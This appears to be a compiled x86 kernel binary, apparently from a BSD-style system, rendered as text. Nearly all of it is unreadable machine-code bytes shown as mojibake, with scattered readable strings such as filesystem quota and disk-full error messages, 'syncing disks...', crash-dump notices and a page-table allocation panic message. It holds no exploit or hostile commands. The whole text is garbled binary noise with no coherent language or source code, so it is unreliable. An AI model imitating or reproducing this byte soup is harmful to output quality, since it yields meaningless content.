‹@‹Mä9tC9Ó|è·G9Ã}
ÇEè0
ÇEè1
‹DŸ‰DŸC·G9Ã|ïfÿO‹Mà‰

j
"'
‹B<‰ë¿Ç

j
)þÿƒÄƒ|
öAtƒA‹Q
ÆB
j
"
"9
‰Ç{+~...ÿ~S¿F
9Ç|8ÿ"üð¿F
˜üðÿuè4õýÿƒÄé¢
Rÿsè úýÿƒÄë|Wÿuèúýÿf)~
~ƒÄ‹ÿ¤üð¿F
¨üð‹M‰N9]tI¿F
FÂ+S...Ò~9¿C
9Â| ‹‹S‹J‰M‹B‹
‰A‹‹J‰ÇB
‹MAHŠ^!ƒã‹‹F‰B‹V‹‰ÇF
f‹W
†òf‰W
Pÿuè2
ƒ}Ð†
†òÁÊ†ò‹EØ9u+öG!u%€Mì‹P†òÁÊ†ò‰Uð‹@†àÁÈ†à‰EôÇEØ


‹UÈöBtt‰ÐƒÀTPRèpþÿƒÄ‹EÈƒxT
‹UÈ‹B<+B8‰E¬‹Z4+Z09Ã~‹]¬9Ù[ÿØüð¿G
FHÿ€üð¿
‰}°="üðÿu‹]ÈƒÃ0SèPþÿSÿuÈèïþÿƒÄ‹UÈƒz|




9NDs-‰Ë+^D‰Ø÷ØPÿuèúîýÿf‹FDf‰G
ƒeÌþÿ¬üð°üðƒÄGHF4WVLEÌ¨...*
u
3/4"
˜üðÿÐüðé&	
9Ë
u%‹UÌöÂuƒeÌþ€N-¿_
ÿ"üð˜üðëÿœüð üðSÿuèƒíýÿ_f)_
·G&ƒÄ9Ø~	f)_&ë
ƒeÌßfÇG&

‰Ã_‹FHFD)Ã...ÛŽ
9Ë|a
°üð‹UÌöÂt/fƒ~
u(G+FH...À~-‹FH
ƒeÌöƒÄöEìt!‹G+†ˆ
‹UÈfÇB$6
æ





...Û"m
"


9Âw+‹UÈöBu"ÿuWRè¤

VHŠG!ƒà‰EÌÿ€üð¿
‰}°="üðÿu‹]ÈƒÃ0Sèö
þÿSÿuÈè•
þÿƒÄ‹UÈƒz|

jj
GPÿuWVèî
...
¡PÙðÉÃƒxP
‹u·N‰N\ÇE¤

‰EÀÇE¤

†àÁÈ†à‰ƒÂ¡¸(r)ð†àÁÈ†à‰‹M‹€

‹ufƒ~

‹E¬EÀPÿu´èóë
‹uÿF,€N-‹UÀ‹MQ,‰Q,‹A,‹u+FX...À~‰VXfƒ~f

fƒy



Çôáð(
‹C‰B
‹C‰Bf‹C f‰Bf‹Cf‰BÇB

ƒEü(‹}ü‹M‰y‰yÇA
‹B‰A‹J‹‰ÇB

uj

t¿Cd9üÓð|f¡dÙðf‰Céà
fƒ{~ÿs$è"Žÿÿf‹ClfÁøfCnfÇCl
3/4/
3/4#
uƒ¸"
ÇEø
j
f¡üÓðf‰C‰Ø‹]üÉÃU‰åVS‹E‹u‹]‹M‹Uƒ}
t
¸
Þüÿë¸*
CPÿuè/Ô
"8
"9
‹G‰C
‹G‰Cf‹G f‰Cf‹Gf‰Cf‹C
f‰CfÇC

¿8
¿9
¸


1ÀéÀ	
¸

ë\ƒútëUÿuÿu
ÿuèÎ‹

þÿƒÄë	Sè
þÿƒÄÿ...lÿÿÿ1/2lÿÿÿu93/4€
u)9- 
hððè@÷üÿÇEÌ*ð1/2lÿÿÿ‰}‹WX¡Ì·ð‹JUŒR‹ÿÒƒÄƒø...Žþÿÿ¸



ƒút@ë+ƒúu#1Ûë21/2lÿÿÿ‹WL‰ÑÁù‹u
‰V‰N
ë‹}ÿw8hððèÄöüÿƒÄÿµlÿÿÿè'þÿƒÄ1/2pÿÿÿ
¸
þÿƒÄ...ÀuLÿuj


u9- 

hlðèZ(r)üÿÇlð
hlðèT­üÿÇlð
‹S
‹C‰BVèQþÿjÿvdè§qüÿÇFd
j
ÿrèqüÿ1ÀÉÃ

ƒ8...
‰{8‰_@ëÓ...Û"Ú
u1öƒ?
...lÿÿÿ1/2hÿÿÿ
f
ëN9
‹A£eðë	‹Q
‹A‰B‰Y‹eðúeðt9Z~
‹R
úeðuðúeðu4¡eð‰AÇA
eð=eðeðu	‰
eðë	¡eð‰H
‰
eðë%‹B‰A‰Q
zeðu
‰
eðë‹B‰H
‰J‹]üÉÃ

t
‹uð‹vƒÆ(‰uÔEüPj jj
öAtƒA‹Q
‹AƒÀü


‹V‹F
‰B
~
eðu
‹F£eðë	‹V
‹F‰Bƒ>

ÇCÿÿÿÿë
‹VD†òÁÊ†ò‰S‹V†òÁÊ†ò‰S$‹V†òÁÊ†ò‰S(‹V†òÁÊ†ò‰Sj
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<†òÁÊ†ò‰SP‹VT†òÁÊ†ò‰ST‹VP†òÁÊ†ò‰SX‰ø¥8ÿÿÿ[^_ÉÃ

S...Ûu÷E´PE¸PRWj
öCtƒC‹S
‹CƒÀü
‹EƒE ë3...ÄýÿÿPRj EPEPè•ý

hÖ-ðèÐ3/4üÿ‹E 9Cu
‹S
‰-Œ
‹K‹S
‰Q
‹E 9C
u
‹S‰-ˆ
hÝ-ðèÀ1/2üÿ‹E¤9Fu-ÿuÿu
jVèöõÿÿÄ...Àu‹"Ä
öG@"#þÿÿ÷

‹H
‹P‰Qƒþuë
ƒþu
ƒ`0¿ë€H0@ƒ}
‹uƒE ë!EÜPRj EPEPèðõ

‹UƒE ë;•|ÿÿÿRQj URURè)ô
1Àé
‹•dÿÿÿƒÂD‰•dÿÿÿ‹‹•PÚð†òÁÊ†ò‰ƒ>
u
·V
0Ìðë‹
·V
 Ìð†òÁÊ†ò‰S¿V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S
‹V
òÁÊòSxÿ...+
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<†òÁÊ†ò‰SP‹VT†òÁÊòSTVPòÁÊòSX...Hÿÿÿ¥8ÿÿÿ[^_ÉÃ

DòÁÊòS ...@ÿÿÿ‹P†òÁÊ†ò‰S,‹P†òÁÊ†ò‰S0‹P†òÁÊ†ò‰S‹P†òÁÊ†ò‰S‹PL†òÁÊ†ò‰S$‹PH†òÁÊ†ò‰S(‹P$†òÁÊ†ò‰S4‹P(†òÁÊ†ò‰S8‹P,†òÁÊ†ò‰S<‹P0†òÁÊ†ò‰S@‹P4†òÁÊ†ò‰SD‹P8†òÁÊ†ò‰SH‹P@†òÁÊ†ò‰SL‹P<†òÁÊ†ò‰SP‹PT†òÁÊ†ò‰ST‹PP†òÁÊ†ò‰SX‹Eƒxxÿ"L
‹]ƒE ë'•4ÿÿÿRQj URURèqâ

ÇCÿÿÿÿë
‹VD†òÁÊ†ò‰S‹V†òÁÊ†ò‰S$‹V†òÁÊ†ò‰S(‹V†òÁÊ†ò‰Sj
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<†òÁÊ†ò‰SP‹VT†òÁÊ†ò‰ST‹VP†òÁÊ†ò‰SX‰ø¥èþÿÿ[^_ÉÃ
ë,•\ÿÿÿRQjURURè}Ï

‰ÃƒÄ‹
·B
 Ìð‰Á†éÁÉ†é‰O‹•øþÿÿ¿R†òÁÊ†ò‰W...øþÿÿ‹@†àÁÈ†à‰G
‹•øþÿÿ‹R
†òÁÊ†ò‰WƒÄ‹Exxÿ...§
ÇG ÿÿÿÿë‹•øþÿÿ‹RDòÁÊòW ...øþÿÿ‹@†àÁÈ†à‰G,‹•øþÿÿ‹RòÁÊòW0...øþÿÿ‹@†àÁÈ†à‰GøþÿÿRòÁÊòW...øþÿÿ@LàÁÈàG$øþÿÿRHòÁÊòW(...øþÿÿ@$àÁÈàG4øþÿÿR(òÁÊòW8...øþÿÿ@,àÁÈàG<øþÿÿR0òÁÊòW@...øþÿÿ@4àÁÈàGDøþÿÿR8òÁÊòWH...øþÿÿ‹@@†àÁÈ†à‰GLøþÿÿR<òÁÊòWP...øþÿÿ@TàÁÈàGTøþÿÿRPòÁÊòWX...üþÿÿ@)...
ÿÿÿ‹
ÿÿÿƒÁ€áü9ÿÿÿu9
ÿÿÿt‰Ê+•
ÿÿÿR‹•ÿÿÿ)ÊRÿµHÿÿÿè	Ð
Ç...þÿÿ
‹]ƒE ë'•LþÿÿRQj URURèU¿
ƒx

ƒù+
ë'ƒù~‹]‹Eƒxxÿt
‰ÚƒÂ,ë‹UƒÂ ‰UëK•4ÿÿÿRQº 
'ÿÿlÿÿÿÄ Ç...
ÿÿÿ4±ð‰•ÿÿÿ...hÿÿÿ...ÿÿÿ...|ÿÿÿ...ÿÿÿ...ÿÿÿ...ÿÿÿ¡4±ð‹J•
ÿÿÿR‹ÿÒ...

ƒxÿ"±
ÇC0ÿÿÿÿ...ÿÿÿ‹P,†òÁÊ†ò‰S4ƒx0ÿt ‹H0ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S8ë
ÇC8ÿÿÿÿ...ÿÿÿ‹P4†òÁÊ†ò‰S<ƒx8ÿt$‹H8ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S@é¯
‹EƒEë0E"PRjEPEPè¬ž
ýÿƒÄ...Û...œ
"
Ç...hÿÿÿ
"
"
Ç...Üþÿÿ
Ç...àþÿÿ
"
ƒú+
ë'ƒú~‹E‹Mƒyxÿt
‰ÂƒÂ,ë‹UƒÂ ‰UëK...ÿÿÿPR¸ 
Ç...Èþÿÿ
‹UƒE ë+•4ÿÿÿRQj URURè5Š
ÿÿÿ‹•(ÿÿÿÇB
ÇC0ÿÿÿÿ...üþÿÿ‹P,†òÁÊ†ò‰S4ƒx0ÿt ‹H0ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S8ë
ÇC8ÿÿÿÿ...üþÿÿ‹P4†òÁÊ†ò‰S<ƒx8ÿt$‹H8ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S@é
‹EƒEë0E"PRjEPEPèä}
"
‹EƒEë4U1/4RPjURURèôz
Ç... ÿÿÿ
‹`ÿÿÿƒ;
ºd
ÿ
œÈð‹V‹‰Øfð‰=
ÿ
œÈð‹V‹‰Øfð‰=
‹ˆ|ðë‹Tið‰ƒÇ9u¨t91/2dÿÿÿv+~
‰~ë‰ú+U¤VjJÿµLÿÿÿèÓ"ûÿjJÿu"èÉ"ûÿ...4ÿÿÿ¥ÿÿÿ[^_ÉÃU‰åìô

°
·B
 Ìð‰Á†éÁÉ†é‰K‹•Dþÿÿ¿R†òÁÊ†ò‰S...Dþÿÿ‹@†àÁÈ†à‰C
‹•Dþÿÿ‹R
†òÁÊ†ò‰SƒÄ‹Exxÿ...ƒ
ÇC ÿÿÿÿë...Dþÿÿ@DàÁÈàC DþÿÿRòÁÊòS,...Dþÿÿ‹@†àÁÈ†à‰C0‹•Dþÿÿ‹R†òÁÊ†ò‰S...Dþÿÿ@àÁÈàCDþÿÿRLòÁÊòS$...Dþÿÿ@HàÁÈàC(DþÿÿR$òÁÊòS4...Dþÿÿ‹@(†àÁÈàC8DþÿÿR,òÁÊòS<...Dþÿÿ@0àÁÈàC@DþÿÿR4òÁÊòSD...Dþÿÿ@8àÁÈàCHDþÿÿR@òÁÊòSL...Dþÿÿ@<àÁÈàCPDþÿÿRTòÁÊòST...Dþÿÿ@PàÁÈàCX8þÿÿ...<þÿÿT...@þÿÿD|...@þÿÿ,þÿÿ9ÐKúÿÿ91/2dþÿÿ‡_

ÿ
œÈð‹V‹‰Øfð‰
ÿ
œÈð‹V‹‰Øfð‰
‹M‰A8€{...å
‰ð†à‹Møë×SèZ·üÿƒÄ...ÿ..."
‹Mü€aûë(‹MüöAt
fƒy$
"

j

j


¨uöBt
1Éë‹M
fƒ:"À%ÿ




öF$...Ùþÿÿû#tÆ...Û...¤
öF$...qýÿÿû#t²...Ûu
‹Mƒ9
(r)üÿ‹MÇ
‰ÊƒEðë"UìRPjUðRUôRèü7
‹R9\žðtCöFt%ÿuðÿuôÿuøVè9ÿÿÄ...À"
‹S8‰Pë	Ç@@B
ÇG$
‹‹W‰Që	‹W‰Èjð‹O‹‰£
ÇEÈ
‹MäƒEäë"UàRQjUäRUèRèÐ.
Àt
€K$éý
‹G
j
¸

ð‰ð
PSèï­ûÿƒÄþ
öA
"U
‹F‰F
ëN‰N
ÇF
ƒ}"ž
t	þ#...bÿÿÿƒ}Ø
ÇB
‰ÂƒEØ(ë&EÔPRj(EØPEÜPè,
‹UØƒEØë%EÔPRjEØPEÜPè¸

‹‹C‰Bë‹C£Pìð‹S‹‰Ç
ÿÈÏð1öëköCt*ÿÐÏðEøPEüPWj
€cýSèÑ£ûÿ‰ðét
‹‹C‰Bë‹C£Pìð‹S‹‰öCt
ÿsèSˆüÿƒÄöC@"Á
€cýSè[¡ûÿ¸
‹‹A‰Bë‹A£Pìð‹Q‹‰j4Qè±eûÿƒÄÙ...Éu¸ÇÀ"ð
‹<ôÙðë
¿
ÇpÝð
¸
‹u
‹6‰uÐ)N‹Uð)Uƒ}
ƒ}ì
¸
h"*ðèÄÃûÿj
]1/4Ã8]Ð]àM1/4‰Y8f‹]Ü€çf‰Y<‹V†òÁÊ†òf‰Q>‹V
†òÁÊ†ò‰Q@‹V†òÁÊ†ò‰QD‹]Ø‰Y|‹Uì‰Qd‹Uð‰Qh‹Mè‹QR<]1/4‰SHƒ}ä
‹]ÐÇC(ÿÿÿÿ‹MÐÇA@
"
‹	Aƒ9
¸F
‹u Ç

j

j



t	}ìÇ(}ä~}ð...ÿt
‰}àÇEÜ
ÇœÝð
öCtƒC‹K
‹UÐÊ
‹W‰ØfðÿœÈð£
j
‹‹A‰Bë‹A‰C
‹Q‹‰j3Qè/ûÿƒÄñ...Éuºeô[^_ÉÃnfsauth1
‹‹A‰Bë‹A£8éð‹Q‹‰j2Qè}-ûÿÉÃ
h¶>ðèäœûÿ€
´_ðƒ}
‹‹C‰Bë‹C£8éð‹S‹‰j2Sè-ûÿƒÄó...ÛuÀèÇÿÿÇ4éð
ƒú
ëƒú~‹Uìƒ}à


Ç Òð

¸
öC0 "$
¸
Çƒ˜
ƒc0÷‹‹¬
ƒÿ"ö
1Àé
ƒÂ,‰Pë
ƒÂ ‹uÀ‰Vƒ}Ü
‹MðƒEðë!UèRQjUðRUôRèL¹ÿÿ‰ÃƒÄ...ÛuF‹Mè‹†òÁÊ†ò‰Uä‹I†éÁÉ†é‰Mà‹EÐ9À
u91/4



öA0"jÿÿÿ‹•hÿÿÿÇ‚°
f1/2Xÿÿÿ
Ç...4ÿÿÿ-
f1/2Xÿÿÿ
‹EðƒEðë!EìPRjEðPEôPèðªÿÿ‰ÃƒÄ...ÛuA‹Eì‹
(tm)ÿÿ‰Ç‰}ÌƒÄöGt‹WW$‹O
O)Êƒú~ é·
‹MìƒEìë$UäRQjÿuÈÿuÄèŽ¢ÿÿ‰EÀƒÄ...À...Püÿÿ‹Mä‹†òÁÊ†ò‰Uà‹I†éÁÉ†é‰MÜ‹]Ô9"À
u91/4
/
ÇAÿÿÿÿ‹G,àÁÈàA0ÿt201/2@ÿÿÿ¸ÓMb÷ï‰ÓÁû‰Dÿÿÿ‰øÁøÚ)ÂòÁÊòQë	ÇAÿÿÿÿ...lÿÿÿPpÿÿÿR...tÿÿÿP‹•Xÿÿÿÿr
ÿrj	ÿµLÿÿÿÿµ\ÿÿÿèeÿÿÃÄ ...Û...ì
ø‰Ú)Â†òÁÊ†ò‰Që	ÇAÿÿÿÿ...\ÿÿÿ@,àÁÈàA\ÿÿÿz0ÿt:B0...Lÿÿÿ¸ÓMb÷­Lÿÿÿ‰ÓÁûPÿÿÿ...LÿÿÿÁø‰Ú)Â†òÁÊ†ò‰Që	ÇAÿÿÿÿ...pÿÿÿP...tÿÿÿP...xÿÿÿPÿw
ÿwj	ÿµTÿÿÿÿµ`ÿÿÿè÷\ÿÿÃÄ ...Û...ò
¸
ÿµpÿÿÿè%ÿÿ...hÿÿÿ‰E"ƒÄö@t‹hÿÿÿ‹AA$‹Q
Q)Ðƒø~$é°
ÿµhÿÿÿÿµpÿÿÿèÁWÿÿÃÄ ...Ûu
ÿu€èTüÿƒÄj
ÿwèÇáúÿ‹pÿÿÿ‹Ad€H0‹AdÇ€˜
ÿqè1/4{ÿÿ‰Ç‰}øƒÄöGt‹GG$‹W
W)Ðƒø~%é±
WÿqèfTÿÿÃÄ ...Ûuÿuôèùýûÿ‹M‹A‹@d€H0‹A‹@dÇ€˜
Qè<§üÿë
ÿuÜèü¦üÿƒÄƒ}ä
ðh€

C
òQ...Tÿÿÿƒx(ÿt6‹P(‰•,ÿÿÿ¸ÓMb÷ê‰ÓÁû<ÿÿÿ...,ÿÿÿÁø‰Ú)Â†òÁÊ†ò‰Që	ÇAÿÿÿÿ...Tÿÿÿ@,àÁÈàATÿÿÿz0ÿt:B0...8ÿÿÿ¸ÓMb÷­8ÿÿÿ‰ÓÁû<ÿÿÿ...8ÿÿÿÁøÚ)ÂòÁÊòQë	ÇAÿÿÿÿ...pÿÿÿPtÿÿÿR...xÿÿÿP‹•Pÿÿÿÿr
ÿrj
WÿµXÿÿÿèÎ4ÿÿÃÄ ...Û...Ì
t‹PP$‹H
H‰Èë‹Eø‹H
H‰ÈƒÀ€‹Uø)Â9ÖŽ¢
ƒ~

¿H
Ç...lÿÿÿ
Ç...lÿÿÿ
Ç...hÿÿÿ
Ç...Tÿÿÿ
ð...EàtèQØ
¸

%s: write failed, file system is full





hZéðè8ûÿ‹]+]‰ÚÁê	-è


%s: create/symlink failed, no inodes free

¡ Òð£xÒð¡xÒð‰ƒì
‹Mƒ|ü
‰ðF`Eè¶
‰ðF`Eè¶
‰ðF`ø‰Ç‹UôÚ‰Uè‹EèyƒÀ
$ø‹Mè)Á‰ÈºþÿÿÿÓÂ‰Ð 
ÿN$‹Møÿ‰Ì
‰ðF`Eà‰Eì‹MÙ‰Mà‹EàyƒÀ
$ø‹Uà)Â‰Ðº
‰ðF`Eà‰Eè‹UøÚ‰Uà‹EàyƒÀ
$ø‹Mà)Á‰ÈºþÿÿÿÓÂ‰Ð‹Mè C9]ô¤‹Uô)V$)-Ì

‰ÁÁØ
‹Eü‹U
‰B(‹N`‹]üÓûS‹U
zU	
‰ÑÁØ
Të‹]
[TËÿ
Æ†Ð
h£ðè´êúÿw89uØÿuüèìûûÿ‹Eôë
ÿuüèÜûûÿ1ÀeÜ[^_ÉÃcg = %d, irotor = %ld, fs = %s


"
Ô
‰ØC\È3/4
èúÿs0ð...ö}F
‰ÁÁù{U	
"
Ô



‰ÚS`‰UÜÿuÜWè;&

´3Ø

uð...ö}ƒÆ
Áþ‰uÜ{U	



"Ø
ÿ‰}äë¶
‰MìCÇEä

fÜþÿÿée
¸
Ç...(ÿÿÿ
Ç...(ÿÿÿ
Ç‡è
Eà(tm)÷}Ü‰Eà‹Uð‹R0Áê	‰UØj


¸
¸
jÿuÀè‹
Ç€P

ƒ{0
hlðèvúÿÇlð
¡ Òð£xÒð‹=xÒð‹EÐ‰¸ì
¸F
‹MìI
‹}ìgÿûÿÿƒ}Ô
ëtƒútëm‹uÀ÷Æ
ƒ{L
hÃOðèžúÿ9{Xu	‹uƒ~
tZSèø(c)ûÿ‹S$€Ê‰S$ƒÄ‹uØ‰5
Í
|Êé
}*‹F@‹L¸ü‹UÈJ(9
¸uG‹Uÿ‹MÈ9y v
‹M¸9
|ÙƒEÀ
ÿMØ...Èþÿÿ...ötVè
"ûÿUÈB$ÁÓe1/4M1/4‹U‰
...ÉuÇÿÿÿÿ1Àe [^_ÉÃ

Ç€´


Ç´
ƒÂ9Ârö·ÁÉÃ

ÇA4ÿÿÿÿ€IÉÃ
fƒøt
ë"fƒøtë¸-

u+9-ˆ
ƒ}"...+
uq9-ˆ
¸



u%9-ˆ
hgrðèôwúÿfµpþÿÿfµüþÿÿ1/2lþÿÿf‰_ß1/2lþÿÿÿµtþÿÿÿµlþÿÿ•øþÿÿRè
uj9-ˆ

%s: write failed, %s disk limit reached

%s: warning, %s %s

%s: write failed, %s %s

%s: write failed, %s inode limit reached

üÿ‰E¨ƒÄ
...À...›
ÌûÿƒÄéõ
‹@8‹U‰D-,‹E¬ƒx<
‹@<‹U‰D-4ÿu¬j
1ÀéÈ
‹M
aÿßÿÿ‰Øeì[^_ÉÃ
PVèP
‹}öD7<t‹uÇ
‹S
‰Q
ë
‹S
‰1/4ìð‹S
‰
fÿC‹}‰é
Ç1/4ìð€ið‰
€iðÇC
‹u°9ut-ÇEØlµð‰uÜ¡lµð‹NUØR‹ÿÒƒÄ}´...Ét‰Y‰
‹u´‰s‰-fÿCfÇC
Ç
ƒ{ 
1Àé\
Vè=)úÿƒÄöFu(9]t'ÇEØ˜µð‰]Ü¡˜µð‹KUØR‹ÿÒéqÿÿÿöFu¶€N}Ð‰}àÇEä
Ç

ƒøu	¸
‰˜
ÇC 
ÇC 
‹V‹R$‰S ‹è
ƒ~ÿ"€
ƒùtë$ƒùtë¸
ƒ~,ÿ"

¸-
¸O
Wèøµûÿë
ÿuüè¸µûÿƒÄWè¯µûÿ‰ðeð[^_ÉÃ
h(ðèÜQúÿ1/2|ÿÿÿÇ

èQ(c)ûÿƒÄÿvèF(c)ûÿƒÄ‹UØÇEÜlµð‰Uà¡lµð‹JUÜR‹ÿÒƒÄ...Àu"1/2xÿÿÿfÿ‚
¥ûÿ‰ðeÈ[^_ÉÃU‰åƒìWVS‹]‹{ÿs
Wÿs‹Sf‹R€Î ·ÒRè+

j
ÿrè(r)Ñùÿ1ÀÉÃufslk1

ÇBT

úÿ1ÀÉÃ


°ðè@@úÿ1Àeø[^ÉÃ
‹K‰Mü‹SQ<‰Uø‹w¶O	IÁà)È‹...´ðð...Àt
=Ðÿðt
=

h[¸ðèœ5úÿjÿuøVÿÐPèNB
‹‹A‰Bë‹A£Ôzð‹Q‹‰fÇA&fÇA2
Ç@
Ç@
ÿKÿCë6ƒ{


äð1ÀëJ=
äðÿ
hç3/4ðè.úÿÇ`žð
Ç`žð
hç3/4ðèw-úÿÇ`žð
Ç`žð
9DžuƒÂÇDžÿÿÿÿë$D
ÿPQÿuèêýÿÿ‹Lžº
ÿPQÿuè­ýÿÿƒÄ
‹Eü£

Ç@íð

‹‹F‰Bë‹F£lžð‹V‹‰€cýë9ƒ>
è1/2

èá

ÇEì


Ç@íð
èMîÿÿé[ÿÿÿ‹UÇ²
‹(tm)‰EfÿHC9]Þ1Û9]~‹Uƒ<š
è
‹Eð‹˜‰E€fÿHC9]³‹w
hÐ
ÇEè
‹‹C‰Bë‹C£D¯ð‹S‹‰ë'‰5




ƒ}Ì
ÇEŒ
ƒ}Œ...Ö
hãðèHúÿ‰uœ9]Ø"È
Vèo
VWÿuè5
þÿÿƒÄ...Àtƒ}ô
ë-‹Mà‹U ‰
‰ðë‹U Ç
hµûðèøðùÿ1öjj‰óÁã
‰ØEüP‹Møÿ1èãà
hà(tm)ðè´·ùÿeø[^ÉÃ



Ç0Uð
h"
ðèÜßùÿ‰Øeô[^_ÉÃ
¸
‹A‰B‹‰P‹B‰ƒÄöAt
ÿrè-ûÿÿë
ÿrè%
¸
SVèÄÿÿÿƒÄÿND‹S‹‰‹‹C‰B‹C
+C)FHöCt
ÿsè"òÿÿë
ÿsèt


1ÀeÄ[^_ÉÃU‰å‹E
ö@t‹@ƒÀPè`'ÿÿƒÄ‹EƒÀPèQ'ÿÿÉÃ
hà(tm)ðè...ŽùÿÉÃ
yÿ...²
u‹]ð‹s ƒ~8tƒ~8t¸
¸
÷Áÿ
ƒøt	ë1Àë
¸
¸#
...Û"-üÿÿëƒûtƒûu¸


ûÿƒÄ(ÇEø˜µð‰]ü‹˜µð‹CV‹ÿÐë8öC&t
h=;ðèh´ùÿƒÄ€c&ïöC& t
c&ßSè(tm)|ùÿƒÄSèh"
€g0¿Wè=uùÿeô[^_ÉÃcpylck

fƒø...-
fƒø..."

€a0¿Qèiiùÿeô[^_ÉÃ
Çläð
q‰pÇA
‹Q‹A‰B‹Q‹A‰‹AÿH4€a&¿ÉÃ
‹Q‹A‰B‹Q‹A‰‹AÿH4€a&¿öA&@t
htTðè±-ùÿ‰Y‰y‰øÁè
Ø#ÀfðÁàdžðÇA
q‰pÇA
‹‹A‰Bë‹A£hÒð‹Q‹‰ÿ
ˆäð€a&ýÉÃ¨t,ƒ9
‹‹A‰Bë‹A£"âð‹A‹‰ÿ
"äðfa&ÿ¿¡"äð€äð9täðv*ƒ=ôfð
ƒútº

‹S‹C‰B‹S‹C‰‹CÿH4€c&¿ÿ
"äðé†
htTðèœ"ùÿ‰s‹}
‰{‰øÁè
ð#ÀfðÁàdžðÇC
9Uv...Uèt	F95päðwÐ95päðtv†‹}‹Mð| ‰ø9Es%‹Mü‰

]
htTðèÜùÿ‹}è‰{‰CÁè
ø#ÀfðÁàdžðÇC

‹S‹C‰B‹S‹C‰CÿH4c&¿*C&(c)@
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹‹C‰Bë‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
¸ÿ
ºÿ


‹Mfƒy(

‹‹C‰Bë‹C£hÒð‹S‹‰Ç

‹C£hÒð‹S‹‰Ç
‹C£hÒð‹S‹‰Ç
¡¤äðƒÀÂ‰ äð‰ÐƒÀ£täð¡|äð@täð£xäð¡täð|äð=päð
h~ðèünùÿeø[^ÉÃ
‹àíð...Òu1ÀÉÃQ%ÿ
h¸ðè€nùÿ‹BR‹@ÿÐÉÃ
h$ðèmùÿ‹Bÿu
R‹@ÿÐÉÃ
¸
ƒøt5ë;‹F<‹P
¶@
9Œðð
"
"
+ùÿƒÄö
uæ€ëöF0tj
Sè""ÿÿƒÄƒ8u
‹Eü÷ÐÁèë¸
¸


h>"ðè Xùÿƒ}Ì




‹uÇž
ÇŒ›ðŒWðƒ=Œ›ð


u¡|Uðj
ÿp‹@ÿÐƒÄ¡|UðSÿp‹@ÿÐ‹]üÉÃ%r
>
é°
ìþpþðé¹



$ïˆ

·ÃƒÁƒÆþyóƒ}ü
hpºðèU4ùÿƒþÿu
‰ú¶ÂÃ·Ó‰ØÁèûÿÿ







PRhÄ1/4ðèm2ùÿƒÄƒ=Tð
PRha1/2ðè².ùÿèm6úÿè1/4ÿÿèÚÿÿƒÄ
ƒ=Lð


  Features=0x%b

=
ëh¨Ãðë
h¬Ãðëh°ÃðèŽ*ùÿƒÄh¸Ãðè*ùÿƒÄ€=4°ð
‹†à
WèJÞøÿ¸
‹G$ƒ 
syncing disks... 








dumping to dev %lx, offset %ld







ëlƒøtWëeƒ=¬Òð



~ßÇPðÿû

èýÿÿj
¸

ÇA,-
‰ÐAL9Eø}.‹]ø9YLu
A4A81ÀëHUø+QL...Ò
ÇA,
ƒ}è
jJÿuüè³¡øÿ‹EèeÜ[^_ÉÃU‰å‹E
‹U¶
ƒ<

ùÿÿ5âðèE}ÿÿÿ5âðèšpÿÿ¡âðÿp è9
u
Sè
ÉÃget_pv_entry: cannot get a pv_entry_t
hŒåðè
¸
...Ét‹‰‹A‰B‹A‰Bë0ÇB
...Ét/9qu9YtÊ	...Éuî...Ét‹‰ÿÀ_ð¡

‰Ù1Àüó¯t@...ÀtœƒÇü‰ú+UøÁú‰ÖÁæ
ÿEð¶Eü‹...h¯ðþÿïûïw

þÿÿ¿ïv
ƒ'ù	
Æ

hÄîðèüþøÿ‰ðÁè‹M‹ƒ<‚
ƒ?
¡ð^ðƒ8


ƒ~
_^ÃVW‹t$
‹|$‹T$BüJt
¬ªÀu÷J1Àë¸?
_^Ã1/4D$t@Ã1ÀÃWV‹|$
‹t$‹T$1À‰ÑÁéüó§u	‰Ñƒáó¦t@^_Ã‹D$ë¸
h#
ðèÈãøÿfƒ¸ä
h/
